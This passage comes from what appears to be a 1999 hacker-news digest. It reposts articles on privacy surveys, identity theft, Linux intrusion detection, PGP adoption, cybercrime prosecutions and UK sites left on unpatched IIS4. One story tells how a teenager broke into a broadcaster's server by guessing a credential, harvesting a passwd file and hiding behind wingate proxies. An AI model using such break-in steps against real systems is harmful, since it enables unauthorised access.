with illegal activities conducted via the Internet on both a criminal and civil basis. "With the Internet becoming more and more available, there are those who will take advantage of other people," he added. Reported By Newsbytes.com, http://www.newsbytes.com . 15:21 CST Reposted 16:51 CST @HWA 16.0 E-COMMERCE AND PRIVACY ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 2:45 am CET NFO Interactive conducted a survey on how netizens feel about e-commerce and privacy. The survey polled more than 4.500 Internet users of which 1.944 had never made an online purchase. Nearly 70 percent of that number would make online purchases if they had assurances that their privacy would be guaranteed. More on this survey Online Consumers Demand E-Commerce Privacy - Study http://www.newsbytes.com/pubNews/99/134914.html By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 16 Aug 1999, 4:19 PM CST The majority of Internet users who are not currently participating in e-commerce would be more likely make purchases online if they felt comfortable that their privacy would be guaranteed, a soon-to-be- released study found. Nearly 70 percent of those netizens who have yet to make an Internet purchase would be enticed to do so if they had assurances that their privacy would be protected, the survey found. Conducted by NFO Interactive, the survey polled more than 4,500 Internet users. Nearly half of those polled (1,944) had never made an online purchase. "It's going to be the (online) merchant's responsibility to educate the users" about privacy protections, NFO Director of Research Tim Washer told Newsbytes today. Other factors that reticent Internet users said would encourage them to make purchases online included deeper price discounts (65 percent) and the ability to return defective or unwanted products to a physical location (28 percent). Washer also stressed the potential value of independent online privacy "seal-of-approval" programs, such as those offered by Truste and BBBOnLine. By funding, promoting and participating in those programs, e-merchants could help ameliorate some consumer concerns about privacy, he contended. Among the attributes survey participants said would attract them to a retail Website were: strong privacy protection standards; access to secure purchasing servers; overall technical reliability; up-to-date content; and timely delivery. The NFO study comes on the heels of another survey, released last week, that indicated nearly a third of all Internet users make purchases online. That survey, conducted by CDB Research & Consulting, found that apprehension about online shopping is dissipating as e-commerce sites improve security procedures and make information about security more readily available. Further information on the NFO study, "Online Retail Monitor: Branding, Segmentation & Web Sites" is available on NFO's Website, located at http://www.nfoi.com/nfointeractive/nfoipr81699.asp . Reported by Newsbytes.com, http://www.newsbytes.com . 16:19 CST Reposted 16:53 CST 17.0 IDENTITY-THEFT ~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 2:30 am CET Anyone seen the Net? Infoworld has a story on identity-theft, people who instead of stealing from you, "become you". Your name, social security number, driver's license number, credit record.. all can easily be hijacked. "It would never happen to me" is a common response, but according to this article more than 500.000 people fall victim to this "social engineering attack" in the US every year. Infoworld August 16, 1999 Future criminals will not need to steal from you -- they will simply `become you' What would you say if we told you that we could "become you" if we wanted? Establish (or ruin) your credit, cash checks, obtain a driver's license or passport, even commit crimes -- all in your name. The sad fact is that your name, social security number, driver's license number, credit record -- essentially what defines you in modern society -- can be easily hijacked. "It would never happen to me" is a common response to what seems inconceivable. The fact is, every year in the United States more than 500,000 people fall victim to this social engineering attack. And it can be one of the most invasive, exhaustive experiences you'll ever endure. Why do so many people each year fall prey to the identity-theft vultures of the world? Simply put, we're too trusting. We preprint our home addresses (and even our driver's license numbers) on our checks. We give out our home phone number to anyone who asks. We throw sensitive bills, as well as bank and credit statements, in the trash. The bottom line is that we, as a society, make it too easy to become victims. By far, the biggest opportunity for an identity thief is not by digging through your trash or overhearing your phone number. Instead, the best time for a thief to garner precious information is during a move. The situation provides such a ripe opportunity for an attacker to pick up box after box of identity-defining information such as birth certificates, social security numbers, paycheck stubs, credit card numbers, and other personal effects. Together, these belongings represent ample means for an attacker to obtain a driver's license, password, and credit card. We've accumulated a small collection of helpful hints to prevent identity theft. Start by purchasing a cross-cut shredder for your home and business: Every document you throw away should be carefully reviewed for sensitive information. Never freely give out information such as address, phone number, or driver's license number -- and never give out your social security number (unless required to). Once your awareness is heightened, you'll be surprised at how many people ask you for these personal items. Obtain a post office box, and use it whenever someone requires an address. Using your credit card over the Internet is fine, just be sure the Web site employs SSL for card number encryption. To get a handle on identity theft, you should also read Identity Theft: the Cybercrime of the Millennium, by John Q. Newman, and 21st Century Revenge: Down and Dirty Tactics for the Millennium, by Victor Santori. Both books are from Loopanics Unlimited and give you a solid foundation on the techniques used by thieves. All this is little help to those who have already fallen victim to an attack. Here's what you can do after turning into a statistic. - Inform the three main credit-reporting bureaus -- Equifax, Experian, and Trans Union -- by phone and letter. Ask that no new credit be approved without your notification beforehand. - Inform all of your current credit card and loan companies about the theft. - Inform all of the check-monitoring agencies, such as CheckRite, Chexsystems, etc. - Make sure your police department files a report on the crime, or your future identity-theft claims may fall on deaf ears. - Obtain a new driver's license, and inform the department of motor vehicles that you suspect identity fraud. - As a last resort, especially if the thief has used your social security number to obtain credit in your name, request a new social security number. However, be careful with this step because it can make it difficult for you to get credit in the future. The physical security of one's identity is as critical as any virtual electronic bits and bytes floating through a silicon wafer or a copper wire. As more of the components of physical identity become translated into digital form, the two will become intrinsically intertwined. For more details on identity theft, visit www.identitytheft.org, www.privacyrights.org, and www.futurecrime.com. Send your anecdotes and precautions to security_watch@infoworld.com. @HWA 18.0 Y2K-THE MOVIE ~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 1:53 am CET Nice theme for a film - Y2K. NBC will use millennium madness and try to earn money on it. In Y2K, the bug causes an East Coast power outage, ATM failures, airliners whose instruments don't work and other assorted calamities. Main character battles one of the biggest imagined consequences of the bug when a nuclear power plant threatens to go into meltdown. @HWA 19.0 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 1:45 am CET The National Criminal Intelligence Service started a unit that will try to catch on-line pedophiles and similar perverts. Insp Terry Jones, the head of the squad, said that the unit monitored few chat rooms for 60 hours - and as a result they arrested 19 suspects. In addition to pedophiles, the unit will investigate some other criminal activities conducted via computers (for instance illegal gambling, blackmail, industrial espionage). Note: read the ACPO (www.antichildporn.org) article in Default #1 here. http://default.net-security.org/1/14.htm XIV. Guest column ----------------- This weeks guest column is by Natasha Grigori of the ACPO, a cause which Help Net Security supports fully. The mission of ACPO, and our goals: ACPO is a non-profit Group formed to actively seek out and stop the exploitation of children on the Internet. Our focus is to protect our children from the predatory and perverse criminal elements that seek to destroy their innocence. While we are firmly in favor of free speech in all its forms, especially on the Internet, we are opposed to the active sexual exploitation of children. We have chosen to act against the dissemination of child pornography over the Internet. Our motivation is the fact that there is a genuine connection between the distribution and acceptance of pedophile pornography and actual incidents of sexually abused children. Not to mention that all-existing hardcore pedophile pornographic material is the result of very real abuse. Our children are our future, as such we must protect them as we would our own lives and in doing so ensure a better future for us all. Our secondary focus is to educate. We want to provide individuals and organizations training about the Internet and its associated risks. We will counsel law enforcement on the Internet aspects of gathering information and evidence. We pursue all of our goals with the ethical and moral values of most anybody confronted with this abhorrent practice. We will tolerate only approaches, and condone no illegal activities. Failure to abide by the ACPO operations standards is ground enough for revocation of ACPO membership. Our goals can be broken down as follows: 1. Provide a maximum of information to concerned law enforcement authorities, including activity hotspots on the Internet and the results of our own investigations into the activities of online child pornographers. 2. Put a halt to sensationalism and hype regarding the Internet while promoting quality investigative journalism on pedophile pornography. 3. Create enough public pressure to bring authorities to the point of action. 4. Form a cooperative with other Internet groups with similar goals, which will benefit us all and increase our impact. We are working to provide a website to which our members will be able to turn for information and resources, and will add other means of communication. Our approach is somewhat different from other organizations, in that we are combining the drive for wide public support with the knowledge of Internet experts. This is our first public description of our mission. We view this as a work in progress that will continue to be refined. If you have any questions or concerns about our Mission Statement, please feel free to mail me at Natasha@infovlad.net You should get a response from me with in a week, possibly less. And BTW look for our exciting news next Friday. ============================ Thanks for being 'Child-Friendly' Natasha Grigori Founder ACPO http://www.antichildporn.org/ http://www.infovlad.net/antichildpornorg/ mailto:natasha@infovlad.net ============================ @HWA 20.0 Y2K PROBLEMS ~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 1:37 am CET Y2K situation will ruin some companies. TriMark Engineering, small company behind the Doorway program published on their site that: "I am happy to announce that ALL released versions of the Doorway program are y2k compliant...Unfortunately the computers used in our operations are not y2k compliant. These computers were purchased and used before Windows 95, and are all old DOS systems. They are not compliant and we do not have the resources to make them compliant". http://execonn.com/doorway @HWA 21.0 GISB WILL USE PGP ~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 1:29 am CET Gas Industry Standards Board (GISB) decided that for securing transactions over the Internet, they will use PGP (Pretty Good Privacy) technology rather than the more popular standard developed by RSA - S/MIME (Secure/Multipurpose Internet Mail Extension). More on the story on Internet Week. http://www.techweb.com/se/directlink.cgi?INW19990816S0032 August 16, 1999, Issue: 777 Section: Systems & Management Utilities Choose PGP Encryption Over S/MIME Rutrell Yasin Suppliers of natural gas now have a standard way of securing electronic transactions between trading partners. While the Gas Industry Standards Board joins a growing list of vertical industry consortia forming such standards, it is among the first major groups to chose PGP (Pretty Good Privacy) encryption and authentication technology rather than the more popular S/MIME (Secure/Multipurpose Internet Mail Extension) standard developed by RSA. The GISB's decision to adopt PGP for its 165 corporate members-which include Amoco, Exxon, Mobil, Con Edison and Pennsylvania Power & Light Co.-is a major endorsement for PGP. This choice came from the fact that PGP is file-based, providing data encryption for both e-mail and file-based data. Also, the group felt it was better suited for its requirements, which include data privacy, integrity, authentication and nonrepudiation. While the S/MIME standard also supports those core functions, it is intended only for e-mail encryption. The GISB has been experimenting with PGP since 1996, before S/MIME became a standard, according to Carl Caldwell, chairman of the GISB's electronic delivery mechanism committee. GISB was looking at ways to send encrypted EDI files, using HTTP as a transport, "but at the time, SSL [Secure Sockets Layer] was owned by Netscape, and we didn't want to pick one specific Web server and browser," Caldwell said. Plus, "we needed a file-based security product." Though S/MIME is the de facto standard for e-mail encryption and an Internet Engineering Task Force draft specification, as well, the IETF is working on AS2, a convergent standard that will let companies securely exchange EDI files, using HTTP as a transport. EDI data will be packaged in MIME messages that use public key security, Caldwell said. PGP will help the GISB member companies secure more than 37 different types of business transactions, from ordering space on a pipeline to moving gas to paying for it once it reaches its destination, GISB officials said. Based on GISB's choice of PGP, the Federal Energy Regulatory Commission (FERC) has mandated that all members of the gas industry implement PGP 2.6 or greater to secure electronic transactions, said Carl Caldwell, chairman of GISB's electronic delivery mechanism subcommittee. GISB and FERC's adoption of a standard for the gas industry is a move in the right direction, said Phil Schacter, an analyst at the Burton Group. "I like the model of a community defining [standards]." Still, Schacter wondered whether there would be interoperability issues between companies using PGP 2.6 and those using newer versions with RSA and X.509 certificates. However, Network Associates, which acquired PGP Inc. last year and is the major supplier of PGP-based software, said it has backward-compatible versions. From its origins as shareware software, PGP has emerged as a de facto standard for data encryption among consumer users and individuals, but not many large companies are using it on an enterprise and extranet basis. Nevertheless, under the auspices of Network Associates, PGP is evolving into a more flexible, robust product for the corporate world, industry analysts said. Network Associates has "broadened the scope of the application, [adding] support for RSA [encryption] and X.509 digital certificates," Schacter said. PGP supports other standards, such as Secure Sockets Layer (the predecessor to the IETF-backed Transport Layer Security protocol) as well as OpenPGP and the Lightweight Directory Assistance protocol. Network Associates offers an integrated suite, called PGP Enterprise Security. PGP's broadened scope is one reason GISB is adopting the technology as a standard, said Rae McQuade, executive director of the standards organization. "We were attempting to develop a standard [that would operate] over a wide variety of hardware, operating systems and programming languages," she said. Copyright ® 1999 CMP Media Inc. @HWA 22.0 SURF ANONYMOUS FOR $5 ~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 1:23 am CET Earlier this year we published that nearly 93 percent of commercial Web sites collect some type of personal data from visitors to their sites. Many privacy related companies are working on solutions that will help users to stay anonymous. Small maker of privacy software Privada (www.privada.net) announced today their program Web Incognito, a product that will allow users to surf the Web and send e-mail anonymously. @HWA 23.0 HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Monday 16th August 1999 on 1:30 pm CET A 23-year-old hacker, was sentenced for two charges of unlawful modification of computer material and two of unauthorised access to a computer to 3 years in jail and his computer was confiscated. Scott Reid, 23, hacked into the Vodaphone short messaging network, sending a message in text form to 32,000 international subscribers telling them they had won a Peugeot 106 car and must ring a certain number to claim it. The number he quoted was that of GS (UK), a Nottingham firm supplying software for the embroidery industry, where he had previously worked. The result, Nottingham Crown Court was told, was that the firm's business was brought to a standstill which caused an estimated 10.000 pound loss in business. Besides that he also infected the computer systems of this company with a trojan horse named "Colourmatch". It appears the attacks were carried out because of a grudge Reid had against his former employer because of a terminated project of his. This was reported in the Daily Telegraph, thanx to ladysharrow for contributing. @HWA 24.0 PROJECTGAMMA BACK ONLINE ~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Monday 16th August 1999 on 1:00 pm CET The populair underground site Project Gamma (pG) has returned after an unfortunate 30-day downtime. Darkridge Security Solution (DSS), the organization that is kind enough to provide hosting for pG, relocated their networks. After the networks relocated, it was approximately 14-days before the vhost was restored; that was the cause of the DSS Web site being displayed on the projectgamma.com domain. Visit Projectgamma.com http://www.projectgamma.com/ @HWA 25.0 DETECTING INTRUDERS IN LINUX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Sunday 15th August 1999 on 11:30 pm CET Here's an article on system intruders in Linux. Besides dealing with how to monitor your system and in this way detect the intruders, it also speaks about how to be prepared for the event your systems get compromised. Because face it, intrusions CAN happen to anyone. Read it http://securityportal.com/direct.cgi?/topnews/tn19990816.html Detecting Intruders in Linux Read this week's other cover story about auditing Cisco routers August 16, 1999 - An intrusion into your network and host systems by persons unknown is one of the biggest nightmares for systems administrators. Many of us don't even want to think about the possibility of this happening, or feel that our perimeter security makes a serious intrusion a remote possibility. However, intrusions can happen to anyone, on any public or private network. In order to best detect and respond to an intrusion, you must first plan for an intrusion, then have all the appropriate monitoring capabilities deployed. Plan for an intrusion Develop a baseline of normal operating conditions. To do this, you should audit the file system, network services, logon activity, normal CPU load, disk utilization, etc. It is important to get a sense of what log files normally look like. A very skilled attacker may leave little evidence of their presence, and only a full system audit can help you detect subtle system variations later. The tools to perform audits range from the simple and familiar utilities, such as netstat, to get network statistics and ps/top, to get CPU stats to more complex tools, such as Tripwire and Logcheck. Tripwire takes a snapshot of your complete file system and generates an MD5 hash of the files, which can be compared with a later snapshot to find any file system variation. Logcheck, part of the Abacus tool set, is a program that automatically will run and check system log files for security violations and unusual activity. Running these tools on a system that is in a pristine state before it is put into production can yield valuable information down the road. Backups - the obligatory statement that solid backups are the only way to be certain that you can recover from an intrusion is inserted here. Your Red Hat Package Manager (RPM) database can be a key indicator of system tampering, so it should be backed up after package adds, deletes and changes. Also make sure you have a clean copy of the bin/rpm binary. RPM's abilities for version control and discovering file dependencies really allow it to shine in warning of file integrity problems. Build an offline kit of standard system utilities. Depending upon how quick you are in detecting an intruder, you may or may not be able to trust normal utilities, like ls, ps, top, mount, cp, mv or grep, to help you detect tampering. A skilled attacker may substitute their own version of ls and top for example, which conveniently filter out rogue daemons they have installed. You should have clean copies of these utilities ready to use. Develop a response plan. A response plan can be as simple or complex as necessary, based upon the value of the systems being protected. Who gets notified, what gets shut down, how long do we have to return to normal operating status are all questions to be answered. The key benefit to ID planning is that we are reacting quickly and appropriately to an intrusion instead of wasting critical time deciding what to do. A network based denial of service attack may require that you immediately disable network services, possibly by unplugging the host from its hub. If there has been a local compromise and malicious programs are running on the host, it may need to be shutdown immediately. If this is an extremely crucial production host, response plans can get complex, but it still is usually better to shut the system down, as you may be racing against a person or program that is two steps ahead of you. Perform Network based monitoring One element of intrusion detection is tracking activity on your network segments. Host-based intrusion detection will tell you the attacks that reached the host and how successful they are. Network monitoring can alert you to attacks occurring through out your network, although it may not give you information about how successful those attacks were. Look for stations entering or leaving your network segments. Arpwatch is a utility that will track new active MAC addresses on your network segment. If you have an SNMP console at your disposal as well as manageable hubs or switches, these will also be able to spot new stations coming online on your network. Look for network sniffers. Trying to find network sniffers may be a difficult job, as they are listening to traffic, but not transmitting anything. Neped is a utility available on Trinux that looks for stations with their NIC set to promiscuous mode, a sure sign of a sniffer. This is not a fullproof tool, but it may be able to catch some sniffers, particularly those based on an older Linux kernel. Some commercial sniffers have tell tale signatures, they may broadcast a licensing packet to look for unauthorized copies of their product. Ngrep. This is a nifty utility that you may want to run on a special management station. Ngrep uses libpcap to capture all of your network traffic and lets you use pattern matching and filtering expressions like grep to look for specific activities, such as all attempts to telnet to your web server. Be aware that modern ethernet switching can make it very difficult to see all the traffic on your network. Running ngrep on a shared hub with a specific host, or perhaps your ISP router may allow you to capture the traffic you are looking for. Some switches have the capability to "mirror" traffic, and send all of the data from one port to another for diagnostics purposes. Perform Host based scanning Running the same tools used for the baseline audit on a regularly scheduled basis is a good way to validate system integrity and look for subtle break ins. In addition, there are utilities that you may want to run on a real time monitoring basis to find problems. Some examples: Swatch, the Syslog Watchdog. This is a lightweight Perl program that continuously monitors SYSLOG for security issues and can dial a pager to report exceptions. Tiger. Written by Texas A&M in response to their own security break-in, this is actually several scripts that can be scheduled to check a wide variety of possible vulnerabilities, such as weak permissions, and can also perform cleanup of scratch files that may have plain text security information in them. Tcp_wrappers is probably the most powerful way to monitor connections to network services on your host in real time. Tcp_wrappers can log incoming connections and filter them based upon additional security criteria. Tcp_wrappers works by tricking inetd into calling it before invoking a network service, such as your telnet or ftp daemons. Tcp_wrappers then logs the connection and either passes the connection on the the appropriate service, such as telnetd, or denies the connection altogether. Tcp_wrappers takes an investment in time to get the most out of it, but is an exceptional program for providing proactive monitoring and filtering of network connections to your host. Building secure systems is not an adequate approach to maintaining long term host security. By developing solid intrusion detection plans, performing comprehensive security audits, and scanning both network segments and host systems, we will have a much better chance at successful intruder detection. @HWA 26.0 WIRELESS CRIME-FIGHTING ~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Sunday 15th August 1999 on 11:00 pm CET Two California communities are being protected by police officers with patrol car access to crime databases and records. A new wireless mobile communication and information system from PacketCluster Patrol software allows officers to do background checks in the record system securely from their cars. Crime-fighting of the future? CNN http://cnn.com/TECH/computing/9908/12/wirelesscop.idg/index.html Wireless crime-fighting August 12, 1999 Web posted at: 3:51 p.m. EDT (1951 GMT) by Dan Caterinicchia From... (IDG) -- Two California communities are being protected by police officers with patrol car access to crime databases and records, thanks to a new wireless mobile communication and information system. PacketCluster Patrol software, produced by Cerulean Technology Inc., Marlborough, Mass., gives the Salinas/Monterey County Mobile Computer Terminal Consortium access to crime-fighting data directly from patrol car-based laptop computers. Using the wireless network, more than 400 patrol officers in the consortium can access records management systems and county, state and federal databases. The officers can access secure information from one or more of the databases in a matter of seconds with a single query. "To be able to share records was previously unheard of.... We couldn't do it over the radio because of the privileged nature of the information, but now officers can do background checks on the system securely, right in their cars," said Sgt. Tracy Molfino of the Salinas Police Department. "Before, we didn't have the communication between agencies, either in person or through a third party," Molfino said. "Now we have cross-jurisdictional communication, and the whole system is progressing in an appropriate fashion." The PacketCluster Patrol system uses wireless modems to link the consortium's 100-plus patrol cars to criminal and motor vehicle databases. Officers can communicate with each other through the system. It also provides the option of cross-referencing previous cases and arrests with variables including identification information, such as birthmarks and scars, and crime patterns in certain locations. An unexpected bonus is that officers can run registration checks on a vehicle to see if its license plates or registration tags have been reported stolen. With the high price of tags in California, that service is being used daily, Molfino said. The alliance has four members and will be adding eight more through a recently awarded federal grant from the Community Oriented Policing Services' Making Officer Redeployment Effective program. With its new members, the consortium plans to expand its wireless ability by integrating a geographic information system application. "With our soon-to-be 12 members, every geographic area of Monterey County will be pulled together into one communications network," Molfino said. "The system is only about three-quarters installed, and we're already getting 10,000 queries a month." @HWA 27.0 15-YEAR-OLD ADMITS HACKING INTO TCS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Sunday 15th August 1999 on 6:20 pm CET By using password "news" along with the same username, a 15-year-old boy hacked into two Television Corporation of Singapore websites. Nice description here of how even simple password guessing can compromise a system. Full story http://www.straitstimes.asia1.com/cyb/cyb1_0813.html Boy, 15, admits hacking into TCS websites He made an educated guess at a user name "news" and used it as the password. He got into the TCS server By PAULINE LEONG LUCK and ingenuity enabled a 15-year-old boy to hack into two Television Corporation of Singapore (TCS) websites on the Internet. He made an educated guess at a user name "news" and used the same word as the password. He got into the TCS server. He told another teenager, 18, about it and they both logged on several times, disrupting the web pages for about 10 hours. Yesterday, the younger boy pleaded guilty in the Juvenile Court to four charges of unauthorised entry and disclosure of password. Four other charges will be taken into consideration in his sentencing. A pre-sentence report will be submitted before the judge decides on the punishment. On June 15 this year, the Secondary 2 student was watching TV at home when he saw an advertisement showing the Internet address www.mediacity.com.sg. He decided to visit the website and used a software function in his computer to connect to the Mediacity server. After trying various combinations of user names and passwords to get into the server, he struck gold with "news". He started exploring the directories and files there. Then he told the 18-year-old whom he had met chatting on the Internet that the server had security weaknesses. He also told him the access code "news". The older boy, an O-level student in a private school, logged on, using a "wingate" to mask his identity. This is a proxy server used to avoid detection. On his advice, the younger boy also used a wingate. The older boy told him to look for more access codes, in case the system administrator disabled their "news" account. The boy found a file called "passwd" which contained all the authorised user names and their corresponding encrypted passwords. He then told the older boy the new user names and passwords, "informix" in particular, and they both used them. The younger boy was arrested seven days later at his home in Clementi. The 18-year-old has been charged. Defence lawyer David Nayar said in mitigation that the 15-year-old was curious and merely guessed at the access code "news". According to the lawyer, the boy did not alter any documents or files, but in his excitement, revealed the access code to another person. He added that the boy has since regretted his actions. A first offender, the 15-year-old is the younger of two boys in his family. His father is a product engineer and his mother, a housewife. They have already banned him from using the Internet. @HWA 28.0 JAPAN CLEARS WIRETAP BILL ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Sunday 15th August 1999 on 6:00 pm CET Japan's upper house of parliament has approved a controversial bill that gives police the power to intercept communications such as telephone calls and Internet e-mail as part of their investigations into organised crime. Untill now, Japan had been the only G8 nation which did not use wiretapping in the course of criminal investigations. Read more below http://www.technologypost.com/internet/DAILY/19990813103941567.asp?Section=Main Published on Friday, August 13, 1999 INTERNET Communications interception Bill clears Japan's upper house NEWSBYTES Lawmakers in Japan's upper house of parliament approved yesterday a controversial bill that gives police the power to intercept communications such as telephone calls and Internet e-mail as part of their investigations into organised crime. Having already cleared the lower house, the vote was the final hurdle to the bill becoming law. Japan had been the only G8 nation which did not use wiretapping in the course of criminal investigations. Lawmakers approved a package of three Bills designed to help police fight organised crime but it was the communications interception bill that prompted the most debate and argument. The Bill is designed to help police battle organised crime and as such restricts the interception of communications to cases involving illegal drugs, weapons, organised group illegal entry into Japan, and organised murders. Campaigners against the bill have a number of fears. Chief among these is that it infringes on an individuals right to privacy. They also worry that police may use information intercepted that is unrelated to the crime under investigation and safeguards on the restriction of use to certain types of crime will prove ineffective. But the government supports the Bill saying it will help the police greatly in the battle against organised crime and groups like the Aum Shinrikyo religious cult that released Sarin nerve gas on the Tokyo subway in 1995. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 29.0 Warez Groups Hit With Racketeering Charges ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Debris Class, Paradigm, and Razor 1911 have been hit with a federal racketeering suit filed by the Interactive Digital Software Association, which is made up of six independent publishers. The IDSA has brought a wide range of charges against dozens of people across the country including copyright and trademark piracy, counterfeiting, and racketeering. Wired http://www.wired.com/news/news/buisness/story/21289.html Game Makers Take Aim at Pirates by Leander Kahney 12:45 p.m. 16.Aug.99.PDT Game companies have filed federal racketeering suit against a nationwide ring of software pirates who methodically distributed top games, sometimes even before they were commercially available. The Interactive Digital Software Association has banded together with six major game publishers to file suit against three alleged pirate rings, known as Class, Paradigm, and Razor 1911. "These are the most sophisticated hacker groups we've run across," said Doug Lowenstein, president of the IDSA, a games industry trade group that helps investigate piracy. "They have tentacles that stretch across the world." According to Lowenstein, the three hacker groups involve hundreds of people worldwide and are capable of churning out pirated software on an industrial scale. The suit recently filed in U.S. District Court in San Francisco names dozens of individuals from across the United States. At their height, the three groups turned out pirated copies of 100 of the most popular games every week, Lowenstein said, costing the industry millions of dollars in lost revenues. The groups are extremely well organized, capable of getting their hands on pre-production copies of popular games, cracking them, and copying them to CD in a matter of days, Lowenstein said. "These groups were responsible for a significant amount of games piracy," he said. "[This suit] won't be the end of games piracy but it's a significant action in a long war." The six publishers -- LucasArts Entertainment, Acclaim Entertainment, The 3DO Company, Infogrames, Bethesda Softworks and Interplay Entertainment, joined the IDSA to file a wide range of charges, the most serious of which include copyright and trademark piracy, counterfeiting, and racketeering. According to the suit, the defendants operated out of San Francisco; Dallas; Minneapolis; Philadelphia; Los Angeles; Buffalo, New York; Austin, Texas; and Champaign, Illinois. Lowenstein declined to name defendants but said they had a significant number of associates overseas, possibly hundreds. The ISDA estimates worldwide piracy cost the U.S. games industry $3.2 billion in 1998. @HWA 30.0 Public UK Sites Susceptible to Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by infowar At DNSCon, held over the weekend in Blackpool England, the public web sites of the Royal Mail and the Scottish Executive where named as being vulnerable to attack. Both sites were labeled as running unpatched versions of Microsoft IIS4. Both sites have since been notified. Con organizers claimed that this implied unacceptable failures in management procedures under the Data Protection Act. A call was also made at the con for a national UK 'Infowar Hotline' to be established where members of the public can safely report on weaknesses in the UK's national Internet and Telecomms infrastructure. DNS Con http://www.dnscon.org DNS Con Press Release http://www.hackernews.com/press/dnscon.html -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Public sector websites vulnerable to InfoWar attacks "named and shamed" at Blackpool Conference. In order to illustrate the need for a UK national InfoWar reporting hotline, some public sector websites, belonging to the Royal Mail and to the Scottish Executive were publicly "named and shamed" as being vulnerable to foreign InfoWar attackers. This announcement was made at Secondary DNS, an international Computer Security and Data Protection conference which was held at the Norbreck Castle Hotel, Blackpool, on Saturday 14th August 1999 website: http://www.dnscon.org encrypted email: infowar@dnscon.org A call was made for the establishment of a national UK InfoWar Hotline, where patriotic members of the public can safely "blow the whistle" on weaknesses in the UK's national Internet and Telecomms infrastructure, 24 hours a day, 365 days a year. These weaknesses will eventually be exploited by criminals, terrorists and other enemies of the UK, damaging our reputation for excellence in information technology, and tarnishing the trustworthiness of the UK brand name in the era of e-commerce. Both the Royal Mail htpp://www.royalmail.co.uk (and the alias http://www.viacode.co.uk) as well as the Scottish Executive (formerly the Scottish Office) http://www.scotland.gov.uk have all or part of their websites hosted on Microsoft IIS4 web servers, which have not had at least a year's worth of freely available security patches applied to them. This implies unacceptable failures in management procedures under the Data Protection Act. Consequently, it was possible for attackers, from anywhere on the Internet, to compromise these systems in a number of way e.g. 1) Denial of Service attacks (both Post Office and Scottish Executive) 2) Compromise of confidential e-commerce information, including names, addresses and credit card details of the Post Office on-line stamps & envelopes customers 3) Compromise of confidential telegrams from friends and families of our military forces in the Balkans sent to BFPO-Kosovo (Post Office) 4) Damage to the trustworthiness of the ViaCode digital certification authority brand name (Post Office). Would you buy Digital Certificates or encryption services from a ViaCode which, since its launch is March, cannot seem to get its own webserver and instead uses the Royal Mail server with a rival South African Thawte digital certificate, rather than a ViaCode one ? 5) Issuance of fake Press releases from the official Scottish Executive website resulting in political embarrassment (re- shuffle the Scottish Cabinet ? ) and/or stock market manipulation ("leak" of Scottish Budget details ?) 6) Installation of Trojan horse remote control software such as netbus, to take complete control of these webservers, possibly using them as a springboard for further InfoWar attacks on the UK internet infrastructure and other back office or internal systems within the Royal Mail or the Scottish Executive. Both the web sites were warned about the planned DNS Conference announcement, with 48 hours warning by email to their webmasters, followed up by special delivery "snail mail" to their top management. To date, only the Royal Mail has responded by fixing the blatant security holes, and publishing a Security Statement on their website http://www.royalmail.co.uk/ISS.htm The "process and technology to secure such systems and data" have obviously failed. Serbian hackers, for example, are unlikely to be deterred by threats of civil proceedings. The senior management of the Royal Mail seems to think that "Microsoft patches have been applied to the website over the last year although some have been omitted where they are not required for our configuration." Last Thursday 12th August is technically "over the last year" but the wwww.royalmail.co.uk systems have been vulnerable for months, so perhaps the senior management are not getting the full picture from their subordinates. "An external organisation has been contracted to test security on our website ("penetration testing")." Presumably this external organisation has only just been hired, as it is inconceivable that a reputable one would have missed the vulnerabilities mentioned above. The Scottish Executive seems to have ignored both the email and "snail mail" warnings, and their website still remains vulnerable. We strongly suggest that any news reports or press releases published on the Sottish Executive website should be independently verified via email, fax or phone. We thank you for your attention For further details, contact us by encrypted email: infowar@dnscon.org or infowar@hushmail.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.0.2i iQA/AwUBN7kFuYOnRwzqxHsCEQLGgQCgxdAAfk lsMt0cnLBQGh3kReSDAFsAoK1mTvtbQRhDQqb3 JXQNDO0C7Dss=QgcM -----END PGP SIGNATURE----- @HWA 31.0 Mitnick Prosecutor Moving to Private Practice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ted After successfully prosecuting Kevin Poulsen, Ron Austin, Justin Petersen, Lewis DePayne and Kevin Mitnick, the federal prosecutor David Schindler will be moving on to private practice. While none of his cyber crime cases actually went to trail he did manage to get guilty pleas from all of them. LA Times http://www.latimes.com/HOME/BUSINESS/CUTTING/lat_schindler990816.htm Online Crime Fighter Signs Off David Schindler Is Leaving U.S. Attorney's Office for Private Practice. By GREG MILLER, Times Staff Writer Kevin Mitnick wasn't the only prominent figure in the computer hacking world closing out a major phase of his career last week. David Schindler, one of Mitnick's prosecutors, was also making something of a curtain 